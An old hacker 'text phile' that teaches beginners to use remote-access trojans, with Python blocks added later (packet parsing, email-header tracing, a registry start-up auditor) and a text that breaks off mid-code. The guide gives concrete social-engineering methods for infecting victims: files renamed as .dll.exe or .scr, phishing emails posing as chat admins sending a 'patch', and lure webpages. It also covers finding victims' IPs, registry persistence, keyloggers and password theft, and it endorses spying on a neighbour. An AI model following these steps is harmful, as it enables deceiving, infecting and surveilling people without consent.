
A Beginners Intro Into Trojaning





~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~
 ##########################################14.08.01###
    _____              _____   _   _   ____    ____
   | ____|   _____    | ____| | | | | |  = |  | ___|
   | |      |     |   | |     | | | | | |\ \  | __|
   | ====    =====    | ====  |  =  | | | \ \ |    |
    =====[c-cure]==================================tm
 #####################################################
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~

                 .-~   presents   ~-.  

        -= A Beginners Intro Into Trojaning =-  
              ._                     _.
                ~ by expl0it_shad0w ~

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

o0 - Table Of Contents - 0o

-= Section 1 =-

A> Introduction
B> Why use trojans?
C> Basic info on trojans

-= Section 2 =-

A> How trojans work
B> The TCP/IP Protocol
C> Basic trojan functions
D> Ways of infecting the victim
E> Ways of getting the victims IP

-= Section 3 =-

A> Advanced trojan functions
B> The trojan ports
C> Start up methods
D> What is a firewall?
E> Binders
F> Making your trojan undetected by AVs
G> Accessing other infected computers

-= Section 4 =-

A> Commonly used trojans
B> Trojans I use
C> Sending emails anonymously
D> Where to get them from
E> Contacting me




-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 1,A =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Introduction

This is my first text phile I've written, so I hope it's useful and I hope you can all learn a thing or two from
it. I decided to write this phile to help beginners into Client/Server applications and the way they communicate. Before
we get into it, there are a few things I want to make clear.
1> Trojans are NOT hacking tools. Anybody who can click a mouse can use them. However, trojans can be used once you
already have access to a system, so you can get back in with ease. If you want to learn to hack, then read another
phile.
2> DON'T use trojans to delete, destroy or corrupt data, unless you know the victim, as this is the lamest thing
EVER.
3> You should ONLY use trojans to have some phun, try it on a friend when they are at work or home.

OK, now that's over, read on......


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 1,B =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Why use trojans?

Many people ask me, "Why use trojans?". There are a few reasons to use them. I personally use them to mess with
friends or to spy on my neighbour, but most of all it's for phun. With trojans there are so many functions to use,
so there are many things to do with the victim, which I will discuss later on in the phile.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 1,C =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Basic info on trojans

A trojan is defined as:
"A destructive program that masquerades as a benign application. Unlike viruses, Trojan horses do not replicate
themselves but they can be just as destructive. One of the most insidious types of Trojan horse is a program that
claims to rid your computer of viruses but instead introduces viruses onto your computer." 

The term comes from a story in Homer's Iliad, in which the Greeks give a giant wooden horse to their foes, the
Trojans, ostensibly as a peace offering. But after the Trojans drag the horse inside their city walls, Greek
soldiers sneak out of the horse's hollow belly and open the city gates, allowing their compatriots to pour in and
capture Troy.

There are many different types of trojan: destructive, Client/Server or just plain annoyance. In this phile we will
only be talking about Client/Server trojans.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 2,A =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

How trojans work

The way a trojan works is quite simple. There are usually two parts to a trojan, Client/Server. The whole idea is
the victim gets a Server which listens on a certain port, and we use the Client to connect to the victim's IP
(explained later) and to the victim's open port, which the trojan is listening on. The Server (once activated)
hides in memory and makes certain changes to the victim's system. It will add a start-up entry to the system's
registry or to the autoexec.bat, win.ini or similar files, so the server can automatically start up
when Windows starts up. The most common start-up method is inside the Windows registry and often looks like this:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Server"="C:\\WINDOWS\\server.exe"

It then copies itself to a hidden place in the windows or windows\system directory, so it is not visible to the user.
This is known as infection. The server can be set up so that once the victim has opened the server phile once, it
melts itself, so clever victims cannot look at the phile. The server can also be set up to send the victim's
details along with current IP and port number to a set email address. Many people now bind trojan servers with other
clean philes so people who are paranoid don't get the wrong idea. Once the victim is infected we can then open up
the client and connect to the remote host with the port number and/or password we set. Once connected we can do a lot of
things (explained later).

  _____                                          _____
 |     |                                        |     |
 |     |-----------|--IP--|--port--|--Password--|     |
 |_____|    wan                                 |_____|
                                                    
local host                                    remote host
- Client -                                     - Server -


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 2,B =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

The TCP/IP Protocal

TCP/IP is a set of protocols developed to allow cooperating computers to share resources across a network. It was
developed by a community of researchers centered around the ARPAnet. Certainly the ARPAnet is the best-known TCP/IP
network. However, as of June 1987, at least 130 different vendors had products that support TCP/IP, and thousands of
networks of all kinds use it. First some basic definitions. The most accurate name for the set of protocols we are
describing is the "Internet protocol suite". TCP and IP are two of the protocols in this suite. Because TCP and IP
are the best known of the protocols, it has become common to use the term TCP/IP or IP/TCP to refer to the whole
family. It is probably not worth fighting this habit.

A connection is fully defined by 4 parameters: a source host and port, and a destination host and port.

When you make a connection, data is sent in packets. Packets take care of low level traffic, and make sure the data
arrives (sometimes with special error handling). The spine of most networks is the IP protocol version 4. It is
totally independent of all hardware protocols. TCP and UDP are higher level protocols wrapped up in IP packets.
All those packets consist of a header and data. The IP header contains (amongst other things): the IP of the source and
destination hosts for that packet, and the protocol type of the packet wrapped up in it (TCP=6, UDP=17, etc.).

UDP packets contain (amongst other things): the port number of the source and destination host. UDP has no such thing as
SEQ/ACK; it is a very weak protocol. TCP packets contain (amongst other things): the port number of the source and
destination host, sequence and acknowledgement numbers (further referred to as SEQ/ACK), and a bunch of flags.
SEQ number: is counted byte per byte, and gives you the number of the NEXT byte to be sent, or that is sent in this
packet. ACK number: is the SEQ number that is expected from the other host. SEQ numbers are chosen at connection
initiation.
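To make the header fields above concrete, here is an added example (not from the original phile) that builds and parses raw IPv4, TCP and UDP headers in Python and checks the SEQ/ACK rule across a three-way handshake. The addresses, ports and initial sequence numbers are constructed, and checksums are left at zero because nothing is sent on a wire.

```python
import struct

# Protocol numbers the text names for the IP header's protocol field.
PROTO_TCP = 6
PROTO_UDP = 17
# TCP flag bits, lowest bit first (FIN=0x01, SYN=0x02, RST=0x04, PSH=0x08, ACK=0x10, URG=0x20).
TCP_FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG"]


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Build a minimal 20-byte IPv4 header (no options; checksum left at 0)."""
    src_b = bytes(int(o) for o in src.split("."))
    dst_b = bytes(int(o) for o in dst.split("."))
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload),
                         1, 0, 64, proto, 0, src_b, dst_b)
    return header + payload


def build_tcp(sport: int, dport: int, seq: int, ack: int, flags: list, data: bytes = b"") -> bytes:
    """Build a 20-byte TCP header (data offset 5 words, window 8192, checksum 0)."""
    bits = sum(1 << TCP_FLAG_NAMES.index(f) for f in flags)
    return struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | bits, 8192, 0, 0) + data


def build_udp(sport: int, dport: int, data: bytes = b"") -> bytes:
    """Build an 8-byte UDP header; there is no SEQ/ACK at all, as the text says."""
    return struct.pack("!HHHH", sport, dport, 8 + len(data), 0) + data


def parse_ipv4(packet: bytes) -> dict:
    """Return source/destination IP, protocol number, TTL and the wrapped payload."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, _id, _frag, ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl & 0x0F) * 4                      # header length in bytes
    if ver_ihl >> 4 != 4 or ihl < 20 or len(packet) < ihl:
        raise ValueError("not a valid IPv4 header")
    return {"src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)),
            "protocol": proto, "ttl": ttl, "payload": packet[ihl:total_len]}


def parse_tcp(segment: bytes) -> dict:
    """Return ports, SEQ/ACK numbers, flag names and data of a TCP segment."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_flags, _win, _csum, _urg = struct.unpack("!HHIIHHHH", segment[:20])
    data_off = (off_flags >> 12) * 4
    names = [n for i, n in enumerate(TCP_FLAG_NAMES) if off_flags & (1 << i)]
    return {"src_port": sport, "dst_port": dport, "seq": seq, "ack": ack,
            "flags": names, "data": segment[data_off:]}


def parse_udp(datagram: bytes) -> dict:
    """Return ports and data of a UDP datagram."""
    if len(datagram) < 8:
        raise ValueError("truncated UDP header")
    sport, dport, length, _csum = struct.unpack("!HHHH", datagram[:8])
    return {"src_port": sport, "dst_port": dport, "data": datagram[8:length]}


def parse_packet(packet: bytes) -> dict:
    """Parse the IP header, then dispatch on its protocol field (6=TCP, 17=UDP)."""
    ip = parse_ipv4(packet)
    payload = ip.pop("payload")
    if ip["protocol"] == PROTO_TCP:
        ip["transport"] = parse_tcp(payload)
    elif ip["protocol"] == PROTO_UDP:
        ip["transport"] = parse_udp(payload)
    else:
        ip["transport"] = None                      # other protocol: left unparsed
    return ip


def handshake_consistent(syn: bytes, synack: bytes, ack: bytes) -> bool:
    """Check the SEQ/ACK rule from the text over a three-way handshake: each
    ACK number is the next byte expected from the peer, i.e. the peer's SYN SEQ plus one."""
    a, b, c = (parse_packet(p)["transport"] for p in (syn, synack, ack))
    return (a["flags"] == ["SYN"] and b["flags"] == ["SYN", "ACK"] and c["flags"] == ["ACK"]
            and b["ack"] == a["seq"] + 1            # server acknowledges the client's SYN
            and c["ack"] == b["seq"] + 1            # client acknowledges the server's SYN
            and c["seq"] == b["ack"])               # client continues at the byte the server expects


# Constructed handshake between a client and a listener on port 12345
# (addresses, ports and initial SEQ numbers are made up for this example).
CLIENT, SERVER = "10.0.0.2", "10.0.0.1"
SYN = build_ipv4(CLIENT, SERVER, PROTO_TCP, build_tcp(40000, 12345, 1000, 0, ["SYN"]))
SYNACK = build_ipv4(SERVER, CLIENT, PROTO_TCP, build_tcp(12345, 40000, 5000, 1001, ["SYN", "ACK"]))
ACK = build_ipv4(CLIENT, SERVER, PROTO_TCP, build_tcp(40000, 12345, 1001, 5001, ["ACK"]))
DNS_QUERY = build_ipv4(CLIENT, SERVER, PROTO_UDP, build_udp(40001, 53, b"query"))

if __name__ == "__main__":
    for name, pkt in (("SYN", SYN), ("SYN/ACK", SYNACK), ("ACK", ACK), ("UDP", DNS_QUERY)):
        print(name, parse_packet(pkt))
    print("handshake consistent:", handshake_consistent(SYN, SYNACK, ACK))
```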

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 2,C =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Basic trojan functions

Here is a list of some basic trojan functions and what they do:

Filemanager - This is used to access the victim's HDs. The file manager will normally have some extra features
inside, some of which are Upload, Download, Execute, Execute hidden, Show image, Set image as desktop wallpaper,
Play sound, Delete a file, Move a file, Make a new folder and Copy a file.

Find Files - This lets you find any file on the victim's HD(s).

Manual cmds - This is often included in a trojan horse so you can enter the commands manually instead of clicking a
button.

Live capture - This is a good function and lets you take lots of pictures of their desktop one after the other so
you can see what's going on.

Open/Close CD rom - self explanatory.

Hide/show start button - self explanatory.

Set system date - self explanatory.

Messageboxes - This option lets you send message boxes to your victim, with the message, buttons and message type you
want to send them.

System colors - This lets you read/change the victim's system colors.

Flip Screen - self explanatory.

Set Resolution - This lets you set the victim's screen resolution.

Mouse Options - This may include enabling/disabling the victim's mouse, swapping buttons or even moving the mouse.

Goto URL - This lets you choose where you want the victim's web browser to go to.

Print Text - This allows you to write a message and make the victim's printer print it out.

Remote host info - This is used to gather information about the remote host.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 2,D =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Ways of infecting the victim

There are a few good ways of infecting the victim:

1> Go and get a messenger like Yahoo! or MSN Messenger (or just one which allows file transfers). Once you have
done this go and find any random person or a lamer and start talking to them. The whole idea is to use social
engineering to trick them into accepting your phile. Say "look at this new yahoo tool I got!" - you will be
surprised how many people actually fall for it.

2> Sit and wait in a chat room listening for people who need a certain phile. And you say "hey I got that phile"
and then start a transfer with your messenger to them. NOTE: Make sure you rename the server to the phile they
want. E.g. if they want Msvbvm60.dll then you rename your server to Msvbvm60.dll.exe (don't worry about leaving the
.exe there, if they are stupid they would have left the Windows settings as they come by default, and Windows chops
off common file extensions so you will be left with .dll instead of .dll.exe). If they don't have messenger, email it
to them.

3> Rename your .exe to .scr and tell somebody in the chatroom that you've got a new screen saver to show them.
When they open it, it will start up like normal, which tricks the user into thinking they just opened a screen saver
instead of a .exe.

4> Set up a simple http server (available from http://www.analogx.com) on your system. Then design a webpage
(the better it looks, the more believable it is) with a link to the server phile and click start on your http
server. Now copy your IP and give it to them in the form of http://yourip, so if your IP is 184.216.84.61 then
the address would be: http://184.216.84.61. NOTE: To find out your IP address go to Start/Run and type: winipcfg
and this will tell you your IP address. The reason I told you this option is simple: say your victim is clever,
and knows not to accept philes from strangers. If you set up a simple http web server with a good webpage then
they might believe that the phile is ok to download.

5> Get your victim's email address, and write a message to them posing as their friend, a company selling a new
product for which they have been chosen as a beta tester, or the admin of Yahoo, MSN or any other chat network they use.
Say that there have been some break-ins to the network by hackers recently and that they are to use the patch you
sent them to help tighten security. NOTE: Don't send the email from your mail account, instead send it anonymously
via telnet or some other anon mail program. (I will explain how to do this later on)


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 2,E =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Ways of getting the victims IP

Now this part is important, because without the IP most Client/Servers don't work.

1> When you are sending them the server phile with a messenger, your machines connect and make a thing called a
Direct Transfer. While they are downloading the phile just open up DOS and type netstat. This also works when they
are sending you a phile, so you can ask them for a phile and then open up DOS and type netstat. NOTE: This will
only work if they are not behind a proxy, because a proxy stops you from seeing their IP. Instead you get the
proxy's IP and this is no good.

  _____                                            _____
 |     |                                          |     |
 |     |<-----------------------------------------|     |
 |_____|            Direct Transfer               |_____|
                                                    
local host                                      remote host
127.0.0.1                                      187.66.121.70     >   By typing netstat we would get 187.66.121.70
                                                                                       This is OK
  _____                   _____                    _____
 |     |                 |     |                  |     |
 |     |<----------------|     |<-----------------|     |
 |_____|                 |_____|                  |_____|
                                                     
local host                proxy                  remote host
127.0.0.1                24.0.0.1               187.66.121.70    >   By typing netstat we would get 24.0.0.1
                                                                                     This is bad

2> Try the above, but this time ask them to email the phile to you (just say you need a system phile). Now when the
email comes, open it up in Outlook Express, choose the message they sent you, click the right mouse button and
go to Properties, Details and there will be some strange information. This is an example of what you will see:

X-Apparently-To: formatkid@yahoo.com via web13406.mail.yahoo.com; 13 Aug 2001 12:03:49 -0700 (PDT)
X-Track: 2: 40
Received: from 66.76.119.67  (HELO formatkid) (66.76.119.67)
by mta574.mail.yahoo.com with SMTP; 13 Aug 2001 12:02:34 -0700 (PDT)
From: lamer@hotmail.com
To: formatkid@yahoo.com
Subject: heres that file you wanted, hope it helps you!
Mime-Version: 1.0

Now the above tells us that this message was sent from 66.76.119.67 and that is our victim's IP address. Note that
the From: line is just whatever the sender typed (see section 4,C), whereas the address in the Received: line was
recorded by the receiving mail server itself.

3> This can be used with the infection method I talked about above where you use an http server. When they connect
to your machine to download the trojan server, use a program that can log them connecting to your machine, e.g. netmon
(available from http://www.leechsoftware.com), or you could use netstat.

4> Most good trojans have an Auto-Notification setting. This allows you to specify your ICQ number or your email
address, so every time they log onto the internet, their details along with their current IP address and port number
are sent to you. Some trojans include CGI notification. This is a rare technique so watch out for it.
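Reading the Received: chain by hand is what method 2 above describes; here is an added example (not the phile's own code) that does it programmatically: it unfolds the headers quoted above, parses each Received: line into the sending address, HELO name, receiving server and timestamp, and reports the earliest hop as the origin. The second header set is a constructed two-hop chain using documentation addresses, and the regexes and function names are mine.

```python
import re

# Headers exactly as the text above shows them (the Outlook Express display has
# dropped the folding whitespace from the Received: continuation line).
SAMPLE_HEADERS = """\
X-Apparently-To: formatkid@yahoo.com via web13406.mail.yahoo.com; 13 Aug 2001 12:03:49 -0700 (PDT)
X-Track: 2: 40
Received: from 66.76.119.67  (HELO formatkid) (66.76.119.67)
by mta574.mail.yahoo.com with SMTP; 13 Aug 2001 12:02:34 -0700 (PDT)
From: lamer@hotmail.com
To: formatkid@yahoo.com
Subject: heres that file you wanted, hope it helps you!
Mime-Version: 1.0
"""

# A constructed two-hop chain (documentation addresses only): the message
# passed through a relay before reaching the recipient's server.
RELAYED_HEADERS = """\
Received: from relay.example.net (relay.example.net [192.0.2.10])
 by mx.example.org with ESMTP; 13 Aug 2001 12:05:00 -0700 (PDT)
Received: from mypc (dialup-17.example.net [198.51.100.17])
 by relay.example.net with SMTP; 13 Aug 2001 12:04:30 -0700 (PDT)
From: someone@example.com
To: you@example.org
Subject: constructed sample
"""

HEADER_LINE = re.compile(r"^([A-Za-z0-9-]+):\s*(.*)$")
IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
RECEIVED = re.compile(r"from\s+(?P<from>\S+)(?P<rest>.*?)\bby\s+(?P<by>\S+)", re.S)
HELO = re.compile(r"\(HELO\s+([^\s)]+)\)", re.I)


def unfold_headers(raw: str) -> list:
    """Return (name, value) pairs.  A line that does not look like 'Name: value'
    is glued onto the previous header, which covers RFC 822 folding and the
    pasted form above where the leading whitespace is missing."""
    headers = []
    for line in raw.splitlines():
        if not line.strip():
            continue
        m = HEADER_LINE.match(line)
        if m and not line[0].isspace():
            headers.append([m.group(1), m.group(2)])
        elif headers:
            headers[-1][1] += " " + line.strip()
    return [tuple(h) for h in headers]


def parse_received(value: str) -> dict:
    """Pull the sending host, the address the receiving server saw, the HELO
    name, the receiving server and the timestamp out of one Received: header."""
    m = RECEIVED.search(value)
    if not m:
        return {"raw": value}
    seen = IPV4.findall(m.group("from") + m.group("rest"))
    helo = HELO.search(m.group("rest"))
    _, _, date = value.partition(";")
    return {"from": m.group("from"), "ip": seen[-1] if seen else None,
            "helo": helo.group(1) if helo else None,
            "by": m.group("by"), "date": date.strip() or None}


def trace(raw: str) -> dict:
    """Walk the Received: chain.  Each server prepends its own line, so the LAST
    Received: header is the earliest hop and names the machine that handed the
    message to the first mail server; that is the origin the text is after."""
    headers = unfold_headers(raw)
    hops = [parse_received(v) for n, v in headers if n.lower() == "received"]
    first = hops[-1] if hops else {}
    from_hdr = next((v for n, v in headers if n.lower() == "from"), None)
    return {"from_header": from_hdr, "origin_ip": first.get("ip"),
            "origin_helo": first.get("helo"), "hops": hops}


if __name__ == "__main__":
    for raw in (SAMPLE_HEADERS, RELAYED_HEADERS):
        result = trace(raw)
        print("From:", result["from_header"], "-> origin", result["origin_ip"])
        for hop in reversed(result["hops"]):      # print in delivery order
            print("   ", hop["ip"], "->", hop["by"], hop["date"])
```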


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,A =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Advanced trojan functions

Window mng - This allows us to view what windows are currently active on their system. It also gives
us options like hide/show, minimize/maximize, close or bring to top a selected window.

Process mng - This allows us to view what active processes are currently in memory. It also lets us terminate any
running process.

Registry editor - This lets us view, edit or change the victim's registry.

Disable/Crash/Reboot - These options let us RAS hangup, crash the system, give a bluescreen error, disable the Windows
GUI, disable keyboard/mouse or exit the Windows kernel.

App re-direct - This lets us get output from their DOS prompt.

Online/Offline Keylogger - This records all keystrokes the victim has made and prints it to screen or file.

Clipboard - This lets us view the victim's clipboard.

Password options - This allows us to view the victim's system passwords.

Server Options - This lets you edit/change the server.

Port re-direct - This listens on one of their remote ports and directs it to another remote IP and port.

Ftp server - This opens up an FTP server on the victim's machine.

Packet Sniffer - This sniffs the packets sent from the victim's machine and sends them to your IP and a remote UDP
port on your system.

Network browser - This allows you to browse the network they are connected to. NOTE: Only if they are connected to
a network.


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,B =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

The trojan ports

Here are a few default trojan ports:
Trojan name = port

NetBus 1.x = 12345
NetBus Pro = 20034
SubSeven = 1243
NetSphere = 30100
Deep Throat = 6670
Master Paradise = 31
Silencer = 1001
Millenium = 20000
Devil 1.03 = 65000
NetMonitor = 7306
Streaming Audio Trojan = 1170
Socket23 = 5000
Socket25 = 30303
Gatecrasher, netControl = 6969 
Telecommando = 61466
Gjamer = 12076
IcqTrojen = 4950
Priotrity = 16969
Vodoo = 1245
Wincrash = 5742
Wincrash2 = 2583
Netspy = 1033
ShockRave = 1981
Stealth Spy = 555
Pass Ripper = 2023
Attack FTP = 666
GirlFriend = 21554
Fore = 50766
DeltaSource (DarkStar) = 6883
Tiny Telnet Server = 34324
Kuang = 30999
SennaSpyTrojans = 11000
Backdoor = 1999
WebEx = 1001
UglyFtp = 23456
TrojanCow = 2001
TheSpy = 40412
Striker = 2565
Silencer = 1001
RoboHack = 5569
RemoteWindowsShutdown = 53001
Prosiak 0.47 = 22222
ProgenicTrojan = 11223
PortalOfDoom = 9872
InIkiller = 9989
IcqTrojan = 4950
BladeRunner = 5400
The tHing = 6400
PsyberStreamingServer Nikhil G. = 1509
Phineas Nikhil G. = 2801
Indoctrination = 6939
HackersParadise = 456
Doly Trojan 1.1+1.2 = 1011
FTP99CMP = 1492
Shiva Burka = 1600
BigGluck, TN = 34324
Hack'99 KeyLogger = 12223
iCkiller = 7789
iNi-Killer = 9989
Portal of Doom = 9875
Master Paradise = 40423
BO jammerkillahV = 121
AOLTrojan1.1 = 30029
Hack'a'tack = 31787
The Invasor  Nikhil G. = 2140
SpySender Nikhil G. = 1807
The Unexplained  = 29891
Bla = 20331
FileNail Danny = 4567
Coma   Danny = 10607
Shitheep  Danny = 69123
Bla1.1 = 1042
HVL Rat5 = 2283
BackConstruction1.2 = 5400
Doly Trojan 1.30 = 1010
Doly Trojan 1.5 = 1015
Trojan Spirit 2001 a = 33911
Vampire 1.0 = 6669
Maverick's Matrix = 1269
Total Eclypse (FTP) = 3791
OOTLT = 5011
Eclipse 2000 = 12701
NetMetro1.0 = 5031
IllusionMailer = 5521
NetAdmin = 555
Logged! = 20203
Shitheep = 6912
Schoolbus 1.6+2.0 = 54321
Chupacabra = 20203
XTCP 2.0 + 2.01 = 5550
Transcout 1.1 + 1.2 = 1999
SoftWar = 1207
Ambush = 106666
DerSpaeher 3 = 2001
ThePrayer 1.x = 9999
HostControl 1.0 = 6669
YAT = 37651
NetRaider = 57341
TCPShell.c = 6666
PC Crasher = 5637
Insane Network 4 = 2000
Mini Command 1.2 = 1050
Mosucker = 16484
Incommand 1.1+1.2+1.3+1.4 = 9400
FakeFTP = 1966
Rat1.2 = 2989
Intruse Pack 1.27b = 30947
Freak 88 = 7001
Asylium Family = 23432
Prosiak = 4444


-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

-= Section 3,C =-

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-

Start up methods

Here are some commonly used start-up methods:

Win.ini = C:\windows\win.ini
[windows]
Run=
Load=

Any filename after run= or load= will start up every time you boot up.
Please note that the file name may be hidden far to the right, so scroll all the way over to see if there isn't a file name
hidden there. Some aol.pws hide over there.

System.ini = c:\windows\system.ini
[boot]
shell=explorer.exe C:\windows\filename

Another way to start up a file is to use the shell method. The file next to explorer.exe will start up whenever
Windows starts up. Also scroll all the way over just to be sure. The file next to explorer.exe can be deleted, stopping
the server from starting up that way. Also, the location should be revealed with the filename. If it isn't revealed,
assume it is in the windows folder and search for the file name there.

Go to Start > Run > type "sysedit". This will open up a program with multiple windows. One window will say system.ini,
one will say win.ini, and there will be two others; ignore those. This is just an easier way of accessing system.ini and
win.ini.

Before we move to the registry there is one folder, C:\WINDOWS\Start Menu\Programs\StartUp;
any file in here will start up when Windows is booted up.

Now the registry. Note that any changes could compromise your system so do only what we say.
To access your registry go to Start > Run > type "regedit" without the "". A window with multiple things that look like
folders should pop up, e.g. HKEY_LOCAL_MACHINE.

There are multiple start-up places in your registry; here is a list:

[HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] ="\"%1\" %*" 

If these keys don't have the "\"%1\" %*" value and have been changed to something like "\"server.exe %1\" %*" then
a file is being run, most likely a Trojan: the extra program is launched every time a file of that type is opened,
which includes the programs started at boot.


These keys were used by Sub7 2.2's new start-up methods:

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\explorer\User shell folders

ICQ Inet:
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]
This key states that all apps listed under it will be executed when ICQNET detects an Internet connection.

[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] ="Scrap object" "NeverShowExt"=""
This key hides the file's extension (NeverShowExt stops Explorer from showing it).

More commonly known keys: 


[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] 
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
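The start-up locations in this section, together with the Run entry shown in section 2,A, are exactly what a defender audits on a suspect machine. Here is an added example (not the phile's own code) that takes the text of a regedit export plus win.ini and system.ini and flags the conditions the text describes: a shell\open\command key that no longer holds "%1" %*, a shell= line with something after explorer.exe, and every run=, load= and Run-key entry listed for review. The export and .ini contents are constructed samples, and the function names are mine.

```python
import re

# Auto-start locations named in the text.  Registry paths are compared
# case-insensitively because the registry itself is.
RUN_KEYS = [
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices",
]
FILE_TYPES = ("exefile", "comfile", "batfile", "htafile", "piffile")
COMMAND_KEYS = [r"HKEY_CLASSES_ROOT\%s\shell\open\command" % t for t in FILE_TYPES] + [
    r"HKEY_LOCAL_MACHINE\Software\CLASSES\%s\shell\open\command" % t for t in FILE_TYPES]
EXPECTED_COMMAND = '"%1" %*'        # what the text says these keys normally hold


def parse_reg_export(text: str) -> dict:
    """Parse a regedit export into {key: {value_name: data}}.  Only string
    values are decoded; other types are kept as their raw text."""
    reg, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            reg.setdefault(key, {})
        elif key and "=" in line and not line.startswith(";"):
            name, _, data = line.partition("=")
            name = "(Default)" if name == "@" else name.strip('"')
            if len(data) >= 2 and data[0] == data[-1] == '"':
                data = re.sub(r"\\(.)", r"\1", data[1:-1])   # undo \\ and \" escapes
            reg[key][name] = data
    return reg


def audit_registry(reg: dict) -> list:
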